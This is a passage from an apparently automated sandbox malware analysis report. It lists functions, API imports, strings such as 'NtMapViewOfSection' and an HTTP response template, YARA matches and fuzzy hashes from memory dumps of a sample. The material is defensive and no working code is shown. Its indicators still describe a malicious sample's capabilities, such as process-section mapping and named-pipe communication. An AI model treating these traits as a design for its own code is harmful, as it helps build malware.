                • htonl.WS2_32 ref: 03895619
                • recvfrom.WS2_32 ref: 0389565D
                • WSAGetLastError.WS2_32 ref: 0389566A
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                • String ID:
                • API String ID: 2310505145-0
                • Opcode ID: 018ee31d047f13e18eb2acc08179a8f443975026078621be6262547f92683203
                • Instruction ID: ea85e8ca9e38aa1fa77d5e741dc63d9c738110ef49445d96f592e1f19de6bc98
                • Opcode Fuzzy Hash: 018ee31d047f13e18eb2acc08179a8f443975026078621be6262547f92683203
                • Instruction Fuzzy Hash: 0A419875314741C6EF12CF65E88071AB7A9F789BA8F1C8596EA4987B64DF38C541CF00
                Function 0349D9A7 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                • String ID:
                • API String ID: 1547050394-0
                • Opcode ID: 2ee4da16ff171bafb35c0bb8db8b3dd677d1343b8b4ea0f09adf6440b25ff7f8
                • Instruction ID: 1719100aa1e7b469b6c7b40fbbb644472bbc04fe5b5d31a0c64d30b7f50a9f8a
                • Opcode Fuzzy Hash: 2ee4da16ff171bafb35c0bb8db8b3dd677d1343b8b4ea0f09adf6440b25ff7f8
                • Instruction Fuzzy Hash: BC21D434A18B094FFB95FF3D980432A7AD5EB9A210F05056F9449CF220EF74CC42878A
                Function 0389E560 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                • String ID:
                • API String ID: 1547050394-0
                • Opcode ID: b28fd23009c431afd31368ed49de371f4cc8ea00af4fe5c0ad9afbaa5be06d71
                • Instruction ID: 28ab2a3d184e456d38c8c7ae9c0fac262690b0fd63dc550b58ca8b82eb79e649
                • Opcode Fuzzy Hash: b28fd23009c431afd31368ed49de371f4cc8ea00af4fe5c0ad9afbaa5be06d71
                • Instruction Fuzzy Hash: 7711D365314B8685FF11DFEAAC0031EAB95BB84BC0F4C48A29E89CBB18EF7CD1118701
                Function 0388F89C Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 0388F8BD
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • free.LIBCMT ref: 0388F8F8
                • fwrite.LIBCMT ref: 0388F939
                • fclose.LIBCMT ref: 0388F941
                • free.LIBCMT ref: 0388F94E
                  • Part of subcall function 0389D188: HeapFree.KERNEL32 ref: 0389D19E
                  • Part of subcall function 0389D188: _errno.LIBCMT ref: 0389D1A8
                  • Part of subcall function 0389D188: GetLastError.KERNEL32 ref: 0389D1B0
                • GetLastError.KERNEL32 ref: 0388F953
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                • String ID:
                • API String ID: 1616846154-0
                • Opcode ID: 55f7a226863731569709ab65466cf2251e8dcd047762f84c6fb73987460c01ea
                • Instruction ID: 4706f696dad45811d587bcb19559b41f716217089fcb977c33825f3cbe217f5f
                • Opcode Fuzzy Hash: 55f7a226863731569709ab65466cf2251e8dcd047762f84c6fb73987460c01ea
                • Instruction Fuzzy Hash: F411C81530478051EE10F7A6B45426EA351EBC6FE4F8C46A2DF5D9FB88DF2CC1068741
                Function 03892DB0 Relevance: 9.1, APIs: 6, Instructions: 51pipefileCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
                • String ID:
                • API String ID: 3798860377-0
                • Opcode ID: 72c7b950336cc460e27c7b46ba728849a6f7e565e48342ed7c09114a024cd772
                • Instruction ID: ab78a8cea03d1be5831d3aa15ff9e56ac774e5d39b7d131e6929db5d597250d0
                • Opcode Fuzzy Hash: 72c7b950336cc460e27c7b46ba728849a6f7e565e48342ed7c09114a024cd772
                • Instruction Fuzzy Hash: 0811017222475983FF10CB65E44872EB364F788BE8F088691EA6A87A98CF7CC445C701
                Function 0389CF70 Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 0389CF93
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • malloc.LIBCMT ref: 0389CFA1
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D25C
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D261
                • malloc.LIBCMT ref: 0389CFC3
                • _snprintf.LIBCMT ref: 0389CFDE
                  • Part of subcall function 0389D57C: _errno.LIBCMT ref: 0389D5B3
                  • Part of subcall function 0389D57C: _invalid_parameter_noinfo.LIBCMT ref: 0389D5BE
                • malloc.LIBCMT ref: 0389CFF9
                Strings
                • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 0389CFC8
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                • API String ID: 3518644649-2739389480
                • Opcode ID: 905fd91b734610568c183788fb82b77138f36b50e46a72f9438916841788d806
                • Instruction ID: da2af4dff07826c43cb8ab2c475adb497fd2ec0614a37982dd57f95f3087e88b
                • Opcode Fuzzy Hash: 905fd91b734610568c183788fb82b77138f36b50e46a72f9438916841788d806
                • Instruction Fuzzy Hash: A401D63670179041EA04DB56B84461DA699F789FE0F58425BEF699B7C4CF38C0428744
                Function 034835B7 Relevance: 8.9, APIs: 7, Instructions: 181COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 03483604
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                • malloc.LIBCMT ref: 0348360F
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C6A3
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C6A8
                • free.LIBCMT ref: 034836F6
                • free.LIBCMT ref: 034836FE
                • free.LIBCMT ref: 03483706
                • free.LIBCMT ref: 03483712
                • free.LIBCMT ref: 0348371F
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc
                • String ID:
                • API String ID: 2761444284-0
                • Opcode ID: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
                • Instruction ID: 141a1d0a74c781ea919c9e5dfbc636c66538fdf76311e87d075163f0841e30f6
                • Opcode Fuzzy Hash: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
                • Instruction Fuzzy Hash: 5041D138718F494FDB69EF2D949057E77D4FB49600750416ED84BCB312EE20EC5286CA
                Function 03884170 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 038841BD
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • malloc.LIBCMT ref: 038841C8
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D25C
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D261
                • free.LIBCMT ref: 038842AF
                • free.LIBCMT ref: 038842B7
                • free.LIBCMT ref: 038842BF
                • free.LIBCMT ref: 038842CB
                • free.LIBCMT ref: 038842D8
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc$AllocHeap
                • String ID:
                • API String ID: 996410232-0
                • Opcode ID: 5fea0d21cf2f5f2329f70d6c53ffcf1dedb90211f69b270b285c9b89b2a82962
                • Instruction ID: 316ce4aae117854ff062b66492fedff4b67f227bc7315624799eb3b03c653255
                • Opcode Fuzzy Hash: 5fea0d21cf2f5f2329f70d6c53ffcf1dedb90211f69b270b285c9b89b2a82962
                • Instruction Fuzzy Hash: 434101273047929BDA15EBBBA95036EA754B749BC0F8885A5CF0A8B705EF38D426C304
                Function 0388EEAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: htonl$freemalloc
                • String ID: zyxwvutsrqponmlk
                • API String ID: 1249573706-3884694604
                • Opcode ID: 4b290ff5cfd48bf3310a40f8a31e8720a67139a53a8d0e20d742a567524f9ec5
                • Instruction ID: cc444657692136afe264f49c1a6e668a00dee0f1e72a8d9ba053fcd52f60d67d
                • Opcode Fuzzy Hash: 4b290ff5cfd48bf3310a40f8a31e8720a67139a53a8d0e20d742a567524f9ec5
                • Instruction Fuzzy Hash: E721F82630174046EF14EBFAA95022DA6D1EB89BD4F4840F9DE49CBB59EE3CD4468301
                Function 038928D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetModuleHandleA.KERNEL32 ref: 03892913
                • GetProcAddress.KERNEL32 ref: 03892923
                • GetLastError.KERNEL32 ref: 038929EB
                  • Part of subcall function 0389ADBC: GetCurrentProcess.KERNEL32 ref: 0389AE49
                  • Part of subcall function 0389B220: GetCurrentProcess.KERNEL32 ref: 0389B24D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                • String ID: NtMapViewOfSection$ntdll.dll
                • API String ID: 1006775078-3170647572
                • Opcode ID: fb54ca6ed3380a5d95a5950137548b411ea98ddaf41e8d9134b8dda9b5f794fd
                • Instruction ID: 734c4645aaeec7e08f3dc0522aebe72db6c7e13f384c40880ad3c86913f0ec45
                • Opcode Fuzzy Hash: fb54ca6ed3380a5d95a5950137548b411ea98ddaf41e8d9134b8dda9b5f794fd
                • Instruction Fuzzy Hash: 4F31C37671074482EB14DBA6F45872AB3E0F788BB4F58436AEE690BB94DF3CC5458740
                Function 004025E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: signal
                • String ID: CCG
                • API String ID: 1946981877-1584390748
                • Opcode ID: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
                • Instruction ID: 8a37928041284c8a434aeccdd4db6f983c568c8f0cf3e4f2934023fa32f313ab
                • Opcode Fuzzy Hash: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
                • Instruction Fuzzy Hash: C321A171B0154146EE296279865D33B10019B9A374F284E379A3DA73E0DEFECCC2830E
                Function 038912A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 038912CA
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • _snprintf.LIBCMT ref: 038912E9
                  • Part of subcall function 0389D57C: _errno.LIBCMT ref: 0389D5B3
                  • Part of subcall function 0389D57C: _invalid_parameter_noinfo.LIBCMT ref: 0389D5BE
                • remove.LIBCMT ref: 038912F5
                • remove.LIBCMT ref: 038912FC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                • String ID: %s\%s
                • API String ID: 1896346573-4073750446
                • Opcode ID: 116c8ba16e338bd99988bf90a74e2fe71a7e1b136674968703a12a75dd4b6793
                • Instruction ID: 9dbbb54499963032ac66cc4fcf2670def3cc7d57c4dcf296ea2a249400efcb33
                • Opcode Fuzzy Hash: 116c8ba16e338bd99988bf90a74e2fe71a7e1b136674968703a12a75dd4b6793
                • Instruction Fuzzy Hash: A5F0B42A608750C5EA00EB96B80026AF360E788FD0F5C41A3EF899BB19CF38C4518788
                Function 0348BEBB Relevance: 7.8, APIs: 6, Instructions: 347COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 03493B83: malloc.LIBCMT ref: 03493B9F
                • malloc.LIBCMT ref: 0348BF65
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                  • Part of subcall function 0349BE7F: malloc.LIBCMT ref: 0349BECF
                  • Part of subcall function 0349BE7F: realloc.LIBCMT ref: 0349BEDE
                • malloc.LIBCMT ref: 0348C057
                • _snprintf.LIBCMT ref: 0348C0D5
                • _snprintf.LIBCMT ref: 0348C0FD
                • _snprintf.LIBCMT ref: 0348C124
                • free.LIBCMT ref: 0348C292
                  • Part of subcall function 0349875B: malloc.LIBCMT ref: 0349878F
                  • Part of subcall function 0349875B: free.LIBCMT ref: 03498946
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: malloc$_snprintf$_errnofree$_callnewhrealloc
                • String ID:
                • API String ID: 2667508507-0
                • Opcode ID: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
                • Instruction ID: 68b15920bc2fe33cdbdcb833118f955c616b3371046ffe64834756bd9d8424b3
                • Opcode Fuzzy Hash: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
                • Instruction Fuzzy Hash: 85A195387087044FEF58FF7A989467E76D6EBD9200F40452F994ACF290EE38D905879A
                Function 0348FDD3 Relevance: 7.7, APIs: 5, Instructions: 205COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 03493B83: malloc.LIBCMT ref: 03493B9F
                  • Part of subcall function 0349D9A7: _errno.LIBCMT ref: 0349D8FE
                  • Part of subcall function 0349D9A7: _invalid_parameter_noinfo.LIBCMT ref: 0349D909
                • fseek.LIBCMT ref: 0348FE6F
                  • Part of subcall function 0349E22B: _errno.LIBCMT ref: 0349E253
                  • Part of subcall function 0349E22B: _invalid_parameter_noinfo.LIBCMT ref: 0349E25E
                • _ftelli64.LIBCMT ref: 0348FE77
                  • Part of subcall function 0349E29F: _errno.LIBCMT ref: 0349E2BD
                  • Part of subcall function 0349E29F: _invalid_parameter_noinfo.LIBCMT ref: 0349E2C8
                • fseek.LIBCMT ref: 0348FE87
                  • Part of subcall function 0349E22B: _fseek_nolock.LIBCMT ref: 0349E27C
                • malloc.LIBCMT ref: 0348FEC7
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                • fclose.LIBCMT ref: 0348FF84
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
                • String ID:
                • API String ID: 2887643383-0
                • Opcode ID: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
                • Instruction ID: 2f644f592829a2e94d4baac09ea6bf40a8d846e6074b77b0bf592f2a860b81c0
                • Opcode Fuzzy Hash: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
                • Instruction Fuzzy Hash: 0A51B335718B084F9749FB2DA49467E73D1FB89600B40466FE48BCB295EE389D06878A
                Function 034A764F Relevance: 7.7, APIs: 5, Instructions: 201COMMON
                Download Yara Rule
                APIs
                • _mtinitlocknum.LIBCMT ref: 034A767C
                  • Part of subcall function 034A1153: _FF_MSGBANNER.LIBCMT ref: 034A1170
                  • Part of subcall function 034A1153: _NMSG_WRITE.LIBCMT ref: 034A117A
                • _lock.LIBCMT ref: 034A768F
                • _lock.LIBCMT ref: 034A76EA
                • _calloc_crt.LIBCMT ref: 034A77A1
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _lock$_calloc_crt_mtinitlocknum
                • String ID:
                • API String ID: 3962633935-0
                • Opcode ID: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
                • Instruction ID: 7b5c71eb6170a54cc1d2c4c84c1763e0cc1e52f72932375a9a2da509a6369896
                • Opcode Fuzzy Hash: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
                • Instruction Fuzzy Hash: 9751F674518F088FD724DF5CC841266BBD0FB68311F15459ED88ACB265D774E842CB86
                Function 03484937 Relevance: 7.7, APIs: 6, Instructions: 175COMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 03484981
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                • malloc.LIBCMT ref: 0348498C
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C6A3
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C6A8
                • free.LIBCMT ref: 03484A73
                • free.LIBCMT ref: 03484A7B
                • free.LIBCMT ref: 03484A87
                • free.LIBCMT ref: 03484A94
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc
                • String ID:
                • API String ID: 2761444284-0
                • Opcode ID: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
                • Instruction ID: 07ccadc6814d77b2b5c4ec55fee561016bd754e95f36546eecf032671980ae5c
                • Opcode Fuzzy Hash: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
                • Instruction Fuzzy Hash: 6941253520CB1E4FAB29FB6E584217F76D9EB95210704423FD487CB312EE24D8078789
                Function 0349DFE4 Relevance: 7.7, APIs: 5, Instructions: 169COMMON
                Download Yara Rule
                APIs
                • _invalid_parameter_noinfo.LIBCMT ref: 0349DEDE
                • memcpy_s.LIBCMT ref: 0349DFA3
                • _fileno.LIBCMT ref: 0349E00E
                  • Part of subcall function 034A2D5B: _errno.LIBCMT ref: 034A2D64
                  • Part of subcall function 034A2D5B: _invalid_parameter_noinfo.LIBCMT ref: 034A2D6F
                  • Part of subcall function 034A423F: __doserrno.LIBCMT ref: 034A4279
                  • Part of subcall function 034A423F: _errno.LIBCMT ref: 034A4280
                • _filbuf.LIBCMT ref: 0349E03C
                • _errno.LIBCMT ref: 0349E08C
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_invalid_parameter_noinfo$__doserrno_filbuf_filenomemcpy_s
                • String ID:
                • API String ID: 1812282339-0
                • Opcode ID: f984b88899510e62cbe18468345cbbe3864e5a8b2208229d8901ea8d74a4c81d
                • Instruction ID: 6bf5b853613e0780d94c6fe261e39371db7ade8de752c633886247067b5e3a9d
